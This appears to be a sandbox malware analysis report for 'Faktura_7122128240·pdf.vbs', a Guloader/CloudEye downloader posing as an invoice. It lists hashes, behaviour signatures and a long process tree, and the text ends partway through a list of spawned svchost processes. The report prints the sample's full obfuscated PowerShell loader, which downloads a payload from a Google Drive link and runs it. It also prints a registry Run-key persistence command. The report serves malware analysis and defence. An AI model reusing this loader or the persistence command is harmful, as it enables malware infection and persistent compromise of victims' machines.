Analysis

  • max time kernel
    299s
  • max time network
    292s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    19-09-2024 06:31

General

  • Target

    Faktura_7122128240·pdf.vbs

  • Size

    7KB

  • MD5

    cc6e41e0786764096a50057a3743e7c6

  • SHA1

    2493a1410d91a8084249ef9f0b3e7aa885ddef5d

  • SHA256

    7e4a39824d8b86485d45a17ebd90a40e02a356a6a3457574303853decb61e09d

  • SHA512

    5bfe75eb2661459a1073348cfadb64ced142baae9ff54fcd7a8733ae7ffc750f9ab41f2e1415ed275c7ec9f33257a7201bf0e5881ff0d26c2eac644c04aee38c

  • SSDEEP

    96:lmXU2FvaJR+t7tVQm+83tkD3J8j0dEvOItsLQWSK+PtevdOYPmCVUbtCpgjPVHQv:lmk2VaJeXj0exCnItmd/Pml9jPp4jQYB

Malware Config

Signatures

  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

  • Blocklisted process makes network request 2 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 64 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies registry class 64 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious behavior: MapViewOfSection 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Faktura_7122128240·pdf.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4808
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Automanipulation='sramana';$Arsenyl=${host}.Runspace;If ($Arsenyl) {$Forhjulstrkket++;$Automanipulation+='Periosteum';$Miljreform='s';$Automanipulation+='Kostfri';$Miljreform+='ubst';$Automanipulation+='simarubaceous';$Miljreform+='ri';$Automanipulation+='Unindigenous';$Miljreform+='ng';};Function Diskpladsers76($Fimsenes){$Glycocholate51=$Fimsenes.Length-$Forhjulstrkket;For( $Agrin=1;$Agrin -lt $Glycocholate51;$Agrin+=2){$Callahan10+=$Fimsenes.$Miljreform.'Invoke'( $Agrin, $Forhjulstrkket);}$Callahan10;}function Albueben($Rundhaandedes){ . ($Forlbelsers) ($Rundhaandedes);}$Kontinuerliges193=Diskpladsers76 'KMboUzGiBl.lCa /P5 .M0s (,WGi,nsdCoswssM NATU F1 0R.P0 ;T .W i nF6F4L; RxC6 4 ;, Or v :U1 2 1c.O0 ) OGNe cAkTo /.2 0s1 0.0 1s0K1G DFci r,eBfBoixM/s1F2 1 . 0 ';$Eskortefartjernes=Diskpladsers76 ',UKs e rM-NA g,eCnBt ';$Bldgrers=Diskpladsers76 'ChOtstFp s : /T/.d.r.iPvTeK.EgMoKo gFlFe .AcEo,mp/Au,cJ?Ee xsp o r t =NdCo,wEnsl oPaIdP& iPd,=B1bC,7 HC1 t f U mCn _ajsU C F KDlFE.8asJ6UFsFL_,0 M Y,v Y n gA9 iH ';$Foresattes=Diskpladsers76 ',>. ';$Forlbelsers=Diskpladsers76 'Oi e xP ';$skandinavismens='Hrenes';$Konsignationen = Diskpladsers76 'DeNc hGo .%.a pFp dEa tFa.%.\KT hPeRiss..,W,e eP &,&U e.cFhFo, st, ';Albueben (Diskpladsers76 ' $ g.l okb a l.:ssAc.o u,r,sI=B( c m.d, /Oc .$ KCo,nFsDi g nma,tCi o nGeTnr)I ');Albueben (Diskpladsers76 '.$Pgsl,oTbVaslB: LPi qNu iRd,iEz eCd.6 6R=K$ BVlsdFg r e r s .Us p lEiPtM(.$ FZoFr.e,s ast t.eXs ). ');Albueben (Diskpladsers76 'R[sNTe t . sbe rNveiOcbe,P oIifnBt M a nTaEgAeCrU].:,: s etc uArRi t y P,rNo.tsoDc,oBlT T=. .[.N eDt,.Bsme cPu r iUt yRPDr ost.o,cEoNlPT y pCe ]s:D: T.l sF1E2, ');$Bldgrers=$Liquidized66[0];$sknnere= (Diskpladsers76 'G$Ug lDoTb.a,lF:FCTosp isnbgBs =FNUeBw.-VOYbUj,ePc.t Ps y s.t.eBm . N.eAt .TWCeFb C.l.iAeTn t');$sknnere+=$scours[1];Albueben ($sknnere);Albueben (Diskpladsers76 't$.Cso,p.i.n gBs...H,e,a.dseOrHsN[E$.EOs.kMoNr tCeIfEairHt jReArHn.ets ] = $.K,o n t i.n u e r.l i g e sC1 9 3U ');$Opt=Diskpladsers76 ' $ CIoIp.iDnBg.ss. D o w.n lOo aGd F iFl eB( $ BPlsdIg r.e,r.sD,,$CD iCePs,e.l i zTaBt iPo nEsO)F ';$Dieselizations=$scours[0];Albueben (Diskpladsers76 ' $Tg,l o b aTl,:,B o y efs =,(CTEessOtA-YP a tLh, P$TDHiLeTs,eEl iEz aNtPi o.nDsU)s ');while (!$Boyes) {Albueben (Diskpladsers76 'a$ g l oPb,asl : sOm i.t.aBbBl e,=P$at rVuKe ') ;Albueben $Opt;Albueben (Diskpladsers76 ' sPtUa,r,t.-fs lPesesps R4, ');Albueben (Diskpladsers76 ',$BgslRo,b aWl :,BLo yDeRs =M( TGe.sHtM-OP.aMtshP M$,DsireLs eFl i z.a t.iEo,nFs ) ') ;Albueben (Diskpladsers76 'I$ g l,o,b.aulT:EG r u nEd.sBk u d dPeVt,9,0s=.$FgRl oTb aslB:IL nCsPu.msmUe rL+B+C%A$ LDiAqsu i dPiBzPe dH6.6P. c oAuan,t. ') ;$Bldgrers=$Liquidized66[$Grundskuddet90];}$Rensningsforanstaltninger=311121;$Denaturerende=27562;Albueben (Diskpladsers76 ' $sgPlso,b a.l :bF o rAr.eGtKnPipn g.s gAr uFn dsl a g =W G.e tD-MCsoGnEtAeAn tR H$HD iOeMsLe,l,i zIaRtUi,o,n s. ');Albueben (Diskpladsers76 'A$.g lPo b a ls:NsBp eTc,i f.iTkUaTtsiso,n s m e t o dFiBkCsB .=, ,[ sfy sOtsePmH. C,o nPv eArCtA]d:C:AF,r oFmGBGa s eB6 4,s.t.rEiUnAg ( $GF osrsrPe.t nei n g sOg rAu nCdslmaHgE)M ');Albueben (Diskpladsers76 '.$ gsl o bVaTl :.GraFl a,nBe r b= k[ sAyUs,tIesmK.,T.e.xPta.IE.nsc oVd,iHn,g ],:s:KAFs C,I Ie. GTe,tFs,t.r,iPnDgD(,$Ks.p e c.i.f i ksaAt.iPo nss,mTe.t o d,i.k s )T ');Albueben (Diskpladsers76 'g$Fg l,oKb,aHl :.H a eUm.n i nTg.= $sG.aLl a,nEe r,.Ns u,b,sAtGr i,nLg.(s$HR e.n,s.n.i nRg,sRf o.r.a,n,s,tAa l t,nRi n,gse rb,s$ DWe nGa,t u rMe.rReDnsdCes)I ');Albueben $Haemning;"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4868
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Theis.Wee && echo t"
        3⤵
          PID:3836
        • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Automanipulation='sramana';$Arsenyl=${host}.Runspace;If ($Arsenyl) {$Forhjulstrkket++;$Automanipulation+='Periosteum';$Miljreform='s';$Automanipulation+='Kostfri';$Miljreform+='ubst';$Automanipulation+='simarubaceous';$Miljreform+='ri';$Automanipulation+='Unindigenous';$Miljreform+='ng';};Function Diskpladsers76($Fimsenes){$Glycocholate51=$Fimsenes.Length-$Forhjulstrkket;For( $Agrin=1;$Agrin -lt $Glycocholate51;$Agrin+=2){$Callahan10+=$Fimsenes.$Miljreform.'Invoke'( $Agrin, $Forhjulstrkket);}$Callahan10;}function Albueben($Rundhaandedes){ . ($Forlbelsers) ($Rundhaandedes);}$Kontinuerliges193=Diskpladsers76 'KMboUzGiBl.lCa /P5 .M0s (,WGi,nsdCoswssM NATU F1 0R.P0 ;T .W i nF6F4L; RxC6 4 ;, Or v :U1 2 1c.O0 ) OGNe cAkTo /.2 0s1 0.0 1s0K1G DFci r,eBfBoixM/s1F2 1 . 0 ';$Eskortefartjernes=Diskpladsers76 ',UKs e rM-NA g,eCnBt ';$Bldgrers=Diskpladsers76 'ChOtstFp s : /T/.d.r.iPvTeK.EgMoKo gFlFe .AcEo,mp/Au,cJ?Ee xsp o r t =NdCo,wEnsl oPaIdP& iPd,=B1bC,7 HC1 t f U mCn _ajsU C F KDlFE.8asJ6UFsFL_,0 M Y,v Y n gA9 iH ';$Foresattes=Diskpladsers76 ',>. ';$Forlbelsers=Diskpladsers76 'Oi e xP ';$skandinavismens='Hrenes';$Konsignationen = Diskpladsers76 'DeNc hGo .%.a pFp dEa tFa.%.\KT hPeRiss..,W,e eP &,&U e.cFhFo, st, ';Albueben (Diskpladsers76 ' $ g.l okb a l.:ssAc.o u,r,sI=B( c m.d, /Oc .$ KCo,nFsDi g nma,tCi o nGeTnr)I ');Albueben (Diskpladsers76 '.$Pgsl,oTbVaslB: LPi qNu iRd,iEz eCd.6 6R=K$ BVlsdFg r e r s .Us p lEiPtM(.$ FZoFr.e,s ast t.eXs ). ');Albueben (Diskpladsers76 'R[sNTe t . sbe rNveiOcbe,P oIifnBt M a nTaEgAeCrU].:,: s etc uArRi t y P,rNo.tsoDc,oBlT T=. .[.N eDt,.Bsme cPu r iUt yRPDr ost.o,cEoNlPT y pCe ]s:D: T.l sF1E2, ');$Bldgrers=$Liquidized66[0];$sknnere= (Diskpladsers76 'G$Ug lDoTb.a,lF:FCTosp isnbgBs =FNUeBw.-VOYbUj,ePc.t Ps y s.t.eBm . N.eAt .TWCeFb C.l.iAeTn t');$sknnere+=$scours[1];Albueben ($sknnere);Albueben (Diskpladsers76 't$.Cso,p.i.n gBs...H,e,a.dseOrHsN[E$.EOs.kMoNr tCeIfEairHt jReArHn.ets ] = $.K,o n t i.n u e r.l i g e sC1 9 3U ');$Opt=Diskpladsers76 ' $ CIoIp.iDnBg.ss. D o w.n lOo aGd F iFl eB( $ BPlsdIg r.e,r.sD,,$CD iCePs,e.l i zTaBt iPo nEsO)F ';$Dieselizations=$scours[0];Albueben (Diskpladsers76 ' $Tg,l o b aTl,:,B o y efs =,(CTEessOtA-YP a tLh, P$TDHiLeTs,eEl iEz aNtPi o.nDsU)s ');while (!$Boyes) {Albueben (Diskpladsers76 'a$ g l oPb,asl : sOm i.t.aBbBl e,=P$at rVuKe ') ;Albueben $Opt;Albueben (Diskpladsers76 ' sPtUa,r,t.-fs lPesesps R4, ');Albueben (Diskpladsers76 ',$BgslRo,b aWl :,BLo yDeRs =M( TGe.sHtM-OP.aMtshP M$,DsireLs eFl i z.a t.iEo,nFs ) ') ;Albueben (Diskpladsers76 'I$ g l,o,b.aulT:EG r u nEd.sBk u d dPeVt,9,0s=.$FgRl oTb aslB:IL nCsPu.msmUe rL+B+C%A$ LDiAqsu i dPiBzPe dH6.6P. c oAuan,t. ') ;$Bldgrers=$Liquidized66[$Grundskuddet90];}$Rensningsforanstaltninger=311121;$Denaturerende=27562;Albueben (Diskpladsers76 ' $sgPlso,b a.l :bF o rAr.eGtKnPipn g.s gAr uFn dsl a g =W G.e tD-MCsoGnEtAeAn tR H$HD iOeMsLe,l,i zIaRtUi,o,n s. ');Albueben (Diskpladsers76 'A$.g lPo b a ls:NsBp eTc,i f.iTkUaTtsiso,n s m e t o dFiBkCsB .=, ,[ sfy sOtsePmH. C,o nPv eArCtA]d:C:AF,r oFmGBGa s eB6 4,s.t.rEiUnAg ( $GF osrsrPe.t nei n g sOg rAu nCdslmaHgE)M ');Albueben (Diskpladsers76 '.$ gsl o bVaTl :.GraFl a,nBe r b= k[ sAyUs,tIesmK.,T.e.xPta.IE.nsc oVd,iHn,g ],:s:KAFs C,I Ie. GTe,tFs,t.r,iPnDgD(,$Ks.p e c.i.f i ksaAt.iPo nss,mTe.t o d,i.k s )T ');Albueben (Diskpladsers76 'g$Fg l,oKb,aHl :.H a eUm.n i nTg.= $sG.aLl a,nEe r,.Ns u,b,sAtGr i,nLg.(s$HR e.n,s.n.i nRg,sRf o.r.a,n,s,tAa l t,nRi n,gse rb,s$ DWe nGa,t u rMe.rReDnsdCes)I ');Albueben $Haemning;"
          3⤵
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2184
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Theis.Wee && echo t"
            4⤵
              PID:5880
            • C:\Program Files (x86)\windows mail\wab.exe
              "C:\Program Files (x86)\windows mail\wab.exe"
              4⤵
              • Suspicious use of NtCreateThreadExHideFromDebugger
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious use of SetThreadContext
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of SetWindowsHookEx
              • Suspicious use of WriteProcessMemory
              PID:3704
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Heliometry% -w 1 $Rrligst138=(Get-ItemProperty -Path 'HKCU:\Hyperaktuelles\').Midwintry;%Heliometry% ($Rrligst138)"
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:3900
                • C:\Windows\SysWOW64\reg.exe
                  REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Heliometry% -w 1 $Rrligst138=(Get-ItemProperty -Path 'HKCU:\Hyperaktuelles\').Midwintry;%Heliometry% ($Rrligst138)"
                  6⤵
                  • Adds Run key to start application
                  • Modifies registry key
                  PID:5196
              • C:\Windows\SysWOW64\svchost.exe
                svchost.exe
                5⤵
                • System Location Discovery: System Language Discovery
                PID:6096
              • C:\Windows\SysWOW64\svchost.exe
                svchost.exe
                5⤵
                • System Location Discovery: System Language Discovery
                • Modifies registry class
                PID:5600
              • C:\Windows\SysWOW64\svchost.exe
                svchost.exe
                5⤵
                • System Location Discovery: System Language Discovery
                PID:2416
              • C:\Windows\SysWOW64\svchost.exe
                svchost.exe
                5⤵
                  PID:5852
                • C:\Windows\SysWOW64\svchost.exe
                  svchost.exe
                  5⤵
                    PID:4080
                  • C:\Windows\SysWOW64\svchost.exe
                    svchost.exe
                    5⤵
                      PID:3452
                    • C:\Windows\SysWOW64\svchost.exe
                      svchost.exe
                      5⤵
                      • Modifies registry class
                      PID:352
                    • C:\Windows\SysWOW64\svchost.exe
                      svchost.exe
                      5⤵
                      • System Location Discovery: System Language Discovery
                      • Modifies registry class
                      PID:4152
                    • C:\Windows\SysWOW64\svchost.exe
                      svchost.exe
                      5⤵
                      • System Location Discovery: System Language Discovery
                      • Modifies registry class
                      PID:2276
                    • C:\Windows\SysWOW64\svchost.exe
                      svchost.exe
                      5⤵
                      • Modifies registry class
                      PID:2252
                    • C:\Windows\SysWOW64\svchost.exe
                      svchost.exe
                      5⤵
                      • Modifies registry class
                      PID:2344
                    • C:\Windows\SysWOW64\svchost.exe
                      svchost.exe
                      5⤵
                      • System Location Discovery: System Language Discovery
                      PID:1644
                    • C:\Windows\SysWOW64\svchost.exe
                      svchost.exe
                      5⤵
                      • Modifies registry class
                      PID:4212
                    • C:\Windows\SysWOW64\svchost.exe
                      svchost.exe
                      5⤵
                      • Modifies registry class
                      PID:4988
                    • C:\Windows\SysWOW64\svchost.exe
                      svchost.exe
                      5⤵
                      • Modifies registry class
                      PID:5440
                    • C:\Windows\SysWOW64\svchost.exe
                      svchost.exe
                      5⤵
                      • System Location Discovery: System Language Discovery
                      • Modifies registry class
                      PID:5704
                    • C:\Windows\SysWOW64\svchost.exe
                      svchost.exe
                      5⤵
                      • System Location Discovery: System Language Discovery
                      • Modifies registry class
                      PID:1072
                    • C:\Windows\SysWOW64\svchost.exe
                      svchost.exe
                      5⤵
                        PID:1032
                      • C:\Windows\SysWOW64\svchost.exe
                        svchost.exe
                        5⤵
                        • System Location Discovery: System Language Discovery
                        PID:4000
                      • C:\Windows\SysWOW64\svchost.exe
                        svchost.exe
                        5⤵
                        • System Location Discovery: System Language Discovery
                        • Modifies registry class
                        PID:4456
                      • C:\Windows\SysWOW64\svchost.exe
                        svchost.exe
                        5⤵
                        • System Location Discovery: System Language Discovery
                        • Modifies registry class
                        PID:3172
                      • C:\Windows\SysWOW64\svchost.exe
                        svchost.exe
                        5⤵
                          PID:3168
                        • C:\Windows\SysWOW64\svchost.exe
                          svchost.exe
                          5⤵
                          • System Location Discovery: System Language Discovery
                          PID:4396
                        • C:\Windows\SysWOW64\svchost.exe
                          svchost.exe
                          5⤵
                          • Modifies registry class
                          PID:4264
                        • C:\Windows\SysWOW64\svchost.exe
                          svchost.exe
                          5⤵
                          • Modifies registry class
                          PID:4688
                        • C:\Windows\SysWOW64\svchost.exe
                          svchost.exe
                          5⤵
                            PID:5060
                          • C:\Windows\SysWOW64\svchost.exe
                            svchost.exe
                            5⤵
                              PID:3272
                            • C:\Windows\SysWOW64\svchost.exe
                              svchost.exe
                              5⤵
                              • System Location Discovery: System Language Discovery
                              PID:4316
                            • C:\Windows\SysWOW64\svchost.exe
                              svchost.exe
                              5⤵
                              • System Location Discovery: System Language Discovery
                              • Modifies registry class
                              PID:4392
                            • C:\Windows\SysWOW64\svchost.exe
                              svchost.exe
                              5⤵
                              • System Location Discovery: System Language Discovery
                              • Modifies registry class
                              PID:1220
                            • C:\Windows\SysWOW64\svchost.exe
                              svchost.exe
                              5⤵
                              • System Location Discovery: System Language Discovery
                              • Modifies registry class
                              PID:6020
                            • C:\Windows\SysWOW64\svchost.exe
                              svchost.exe
                              5⤵
                              • System Location Discovery: System Language Discovery
                              PID:1196
                            • C:\Windows\SysWOW64\svchost.exe
                              svchost.exe
                              5⤵
                              • Modifies registry class
                              PID:3224
                            • C:\Windows\SysWOW64\svchost.exe
                              svchost.exe
                              5⤵
                              • Modifies registry class
                              PID:5288
                            • C:\Windows\SysWOW64\svchost.exe
                              svchost.exe
                              5⤵
                              • System Location Discovery: System Language Discovery
                              PID:1820
                            • C:\Windows\SysWOW64\svchost.exe
                              svchost.exe
                              5⤵
                              • System Location Discovery: System Language Discovery
                              • Modifies registry class
                              PID:6060
                            • C:\Windows\SysWOW64\svchost.exe
                              svchost.exe
                              5⤵
                              • System Location Discovery: System Language Discovery
                              PID:5676
                            • C:\Windows\SysWOW64\svchost.exe
                              svchost.exe
                              5⤵
                                PID:5236
                              • C:\Windows\SysWOW64\svchost.exe
                                svchost.exe
                                5⤵
                                • System Location Discovery: System Language Discovery
                                PID:4840
                              • C:\Windows\SysWOW64\svchost.exe
                                svchost.exe
                                5⤵
                                  PID:1504
                                • C:\Windows\SysWOW64\svchost.exe
                                  svchost.exe
                                  5⤵
                                  • Modifies registry class
                                  PID:2944
                                • C:\Windows\SysWOW64\svchost.exe
                                  svchost.exe
                                  5⤵
                                  • System Location Discovery: System Language Discovery
                                  • Modifies registry class
                                  PID:400
                                • C:\Windows\SysWOW64\svchost.exe
                                  svchost.exe
                                  5⤵
                                  • Modifies registry class
                                  PID:1760
                                • C:\Windows\SysWOW64\svchost.exe
                                  svchost.exe
                                  5⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:1676
                                • C:\Windows\SysWOW64\svchost.exe
                                  svchost.exe
                                  5⤵
                                  • Modifies registry class
                                  PID:4348
                                • C:\Windows\SysWOW64\svchost.exe
                                  svchost.exe
                                  5⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:2568
                                • C:\Windows\SysWOW64\svchost.exe
                                  svchost.exe
                                  5⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:3156
                                • C:\Windows\SysWOW64\svchost.exe
                                  svchost.exe
                                  5⤵
                                  • Modifies registry class
                                  PID:1988
                                • C:\Windows\SysWOW64\svchost.exe
                                  svchost.exe
                                  5⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:576
                                • C:\Windows\SysWOW64\svchost.exe
                                  svchost.exe
                                  5⤵
                                  • System Location Discovery: System Language Discovery
                                  • Modifies registry class
                                  PID:4884
                                • C:\Windows\SysWOW64\svchost.exe
                                  svchost.exe
                                  5⤵
                                  • Modifies registry class
                                  PID:5216
                                • C:\Windows\SysWOW64\svchost.exe
                                  svchost.exe
                                  5⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:2232
                                • C:\Windows\SysWOW64\svchost.exe
                                  svchost.exe
                                  5⤵
                                  • Modifies registry class
                                  PID:2928
                                • C:\Windows\SysWOW64\svchost.exe
                                  svchost.exe
                                  5⤵
                                  • Modifies registry class
                                  PID:4548
                                • C:\Windows\SysWOW64\svchost.exe
                                  svchost.exe
                                  5⤵
                                  • System Location Discovery: System Language Discovery
                                  • Modifies registry class
                                  PID:5680
                                • C:\Windows\SysWOW64\svchost.exe
                                  svchost.exe
                                  5⤵
                                  • Modifies registry class
                                  PID:6024
                                • C:\Windows\SysWOW64\svchost.exe
                                  svchost.exe
                                  5⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:1536
                                • C:\Windows\SysWOW64\svchost.exe
                                  svchost.exe
                                  5⤵
                                    PID:5464
                                  • C:\Windows\SysWOW64\svchost.exe
                                    svchost.exe
                                    5⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:2236
                                  • C:\Windows\SysWOW64\svchost.exe
                                    svchost.exe
                                    5⤵
                                    • Modifies registry class
                                    PID:4864
                                  • C:\Windows\SysWOW64\svchost.exe
                                    svchost.exe
                                    5⤵
                                      PID:876
                                    • C:\Windows\SysWOW64\svchost.exe
                                      svchost.exe
                                      5⤵
                                        PID:1512
                                      • C:\Windows\SysWOW64\svchost.exe
                                        svchost.exe
                                        5⤵
                                        • Modifies registry class
                                        PID:3756
                                      • C:\Windows\SysWOW64\svchost.exe
                                        svchost.exe
                                        5⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:4164
                                      • C:\Windows\SysWOW64\svchost.exe
                                        svchost.exe
                                        5⤵
                                          PID:6108
                                        • C:\Windows\SysWOW64\svchost.exe
                                          svchost.exe
                                          5⤵
                                            PID:3612
                                          • C:\Windows\SysWOW64\svchost.exe
                                            svchost.exe
                                            5⤵
                                            • System Location Discovery: System Language Discovery
                                            PID:2268
                                          • C:\Windows\SysWOW64\svchost.exe
                                            svchost.exe
                                            5⤵
                                            • System Location Discovery: System Language Discovery
                                            PID:4388
                                          • C:\Windows\SysWOW64\svchost.exe
                                            svchost.exe
                                            5⤵
                                              PID:520
                                            • C:\Windows\SysWOW64\svchost.exe
                                              svchost.exe
                                              5⤵
                                              • Modifies registry class
                                              PID:4232
                                            • C:\Windows\SysWOW64\svchost.exe
                                              svchost.exe
                                              5⤵
                                              • System Location Discovery: System Language Discovery
                                              PID:6012
                                            • C:\Windows\SysWOW64\svchost.exe
                                              svchost.exe
                                              5⤵
                                              • System Location Discovery: System Language Discovery
                                              • Modifies registry class
                                              PID:2812
                                            • C:\Windows\SysWOW64\svchost.exe
                                              svchost.exe
                                              5⤵
                                              • System Location Discovery: System Language Discovery
                                              • Modifies registry class
                                              PID:2472
                                            • C:\Windows\SysWOW64\svchost.exe
                                              svchost.exe
                                              5⤵
                                                PID:1624
                                              • C:\Windows\SysWOW64\svchost.exe
                                                svchost.exe
                                                5⤵
                                                • Modifies registry class
                                                PID:5048
                                              • C:\Windows\SysWOW64\svchost.exe
                                                svchost.exe
                                                5⤵
                                                • System Location Discovery: System Language Discovery
                                                PID:4320
                                              • C:\Windows\SysWOW64\svchost.exe
                                                svchost.exe
                                                5⤵
                                                • System Location Discovery: System Language Discovery
                                                • Modifies registry class
                                                PID:4324
                                              • C:\Windows\SysWOW64\svchost.exe
                                                svchost.exe
                                                5⤵
                                                • System Location Discovery: System Language Discovery
                                                PID:1152
                                              • C:\Windows\SysWOW64\svchost.exe
                                                svchost.exe
                                                5⤵
                                                • System Location Discovery: System Language Discovery
                                                • Modifies registry class
                                                PID:1944
                                              • C:\Windows\SysWOW64\svchost.exe
                                                svchost.exe
                                                5⤵
                                                  PID:2584
                                                • C:\Windows\SysWOW64\svchost.exe
                                                  svchost.exe
                                                  5⤵
                                                  • System Location Discovery: System Language Discovery
                                                  PID:4976
                                                • C:\Windows\SysWOW64\svchost.exe
                                                  svchost.exe
                                                  5⤵
                                                  • Modifies registry class
                                                  PID:2028
                                                • C:\Windows\SysWOW64\svchost.exe
                                                  svchost.exe
                                                  5⤵
                                                  • System Location Discovery: System Language Discovery
                                                  PID:4068
                                                • C:\Windows\SysWOW64\svchost.exe
                                                  svchost.exe
                                                  5⤵
                                                  • Modifies registry class
                                                  PID:4248
                                                • C:\Windows\SysWOW64\svchost.exe
                                                  svchost.exe
                                                  5⤵
                                                  • System Location Discovery: System Language Discovery
                                                  PID:1956
                                                • C:\Windows\SysWOW64\svchost.exe
                                                  svchost.exe
                                                  5⤵
                                                  • System Location Discovery: System Language Discovery
                                                  PID:4636
                                                • C:\Windows\SysWOW64\svchost.exe
                                                  svchost.exe
                                                  5⤵
                                                  • Modifies registry class
                                                  PID:5800
                                                • C:\Windows\SysWOW64\svchost.exe
                                                  svchost.exe
                                                  5⤵
                                                    PID:2708
                                                  • C:\Windows\SysWOW64\svchost.exe
                                                    svchost.exe
                                                    5⤵
                                                    • Modifies registry class
                                                    PID:2132
                                                  • C:\Windows\SysWOW64\svchost.exe
                                                    svchost.exe
                                                    5⤵
                                                    • System Location Discovery: System Language Discovery
                                                    PID:3328
                                                  • C:\Windows\SysWOW64\svchost.exe
                                                    svchost.exe
                                                    5⤵
                                                    • Modifies registry class
                                                    PID:5204
                                                  • C:\Windows\SysWOW64\svchost.exe
                                                    svchost.exe
                                                    5⤵
                                                    • Modifies registry class
                                                    PID:2632
                                                  • C:\Windows\SysWOW64\svchost.exe
                                                    svchost.exe
                                                    5⤵
                                                      PID:4004
                                                    • C:\Windows\SysWOW64\svchost.exe
                                                      svchost.exe
                                                      5⤵
                                                        PID:4416
                                                      • C:\Windows\SysWOW64\svchost.exe
                                                        svchost.exe
                                                        5⤵
                                                          PID:2536
                                                        • C:\Windows\SysWOW64\svchost.exe
                                                          svchost.exe
                                                          5⤵
                                                          • System Location Discovery: System Language Discovery
                                                          • Modifies registry class
                                                          PID:684
                                                        • C:\Windows\SysWOW64\svchost.exe
                                                          svchost.exe
                                                          5⤵
                                                          • System Location Discovery: System Language Discovery
                                                          PID:4496
                                                        • C:\Windows\SysWOW64\svchost.exe
                                                          svchost.exe
                                                          5⤵
                                                          • System Location Discovery: System Language Discovery
                                                          PID:2396
                                                        • C:\Windows\SysWOW64\svchost.exe
                                                          svchost.exe
                                                          5⤵
                                                          • Modifies registry class
                                                          PID:3448
                                                        • C:\Windows\SysWOW64\svchost.exe
                                                          svchost.exe
                                                          5⤵
                                                            PID:4804
                                                          • C:\Windows\SysWOW64\svchost.exe
                                                            svchost.exe
                                                            5⤵
                                                            • System Location Discovery: System Language Discovery
                                                            • Modifies registry class
                                                            PID:5640
                                                          • C:\Windows\SysWOW64\svchost.exe
                                                            svchost.exe
                                                            5⤵
                                                              PID:4772
                                                            • C:\Windows\SysWOW64\svchost.exe
                                                              svchost.exe
                                                              5⤵
                                                                PID:4576
                                                              • C:\Windows\SysWOW64\svchost.exe
                                                                svchost.exe
                                                                5⤵
                                                                • Modifies registry class
                                                                PID:4704
                                                              • C:\Windows\SysWOW64\svchost.exe
                                                                svchost.exe
                                                                5⤵
                                                                  PID:6052
                                                                • C:\Windows\SysWOW64\svchost.exe
                                                                  svchost.exe
                                                                  5⤵
                                                                    PID:1028
                                                                  • C:\Windows\SysWOW64\svchost.exe
                                                                    svchost.exe
                                                                    5⤵
                                                                    • System Location Discovery: System Language Discovery
                                                                    PID:5392
                                                                  • C:\Windows\SysWOW64\svchost.exe
                                                                    svchost.exe
                                                                    5⤵
                                                                    • System Location Discovery: System Language Discovery
                                                                    • Modifies registry class
                                                                    PID:1392
                                                                  • C:\Windows\SysWOW64\svchost.exe
                                                                    svchost.exe
                                                                    5⤵
                                                                    • System Location Discovery: System Language Discovery
                                                                    PID:2712
                                                                  • C:\Windows\SysWOW64\svchost.exe
                                                                    svchost.exe
                                                                    5⤵
                                                                    • System Location Discovery: System Language Discovery
                                                                    PID:4432
                                                                  • C:\Windows\SysWOW64\svchost.exe
                                                                    svchost.exe
                                                                    5⤵
                                                                    • Modifies registry class
                                                                    PID:2004
                                                                  • C:\Windows\SysWOW64\svchost.exe
                                                                    svchost.exe
                                                                    5⤵
                                                                    • System Location Discovery: System Language Discovery
                                                                    • Modifies registry class
                                                                    PID:756
                                                                  • C:\Windows\SysWOW64\svchost.exe
                                                                    svchost.exe
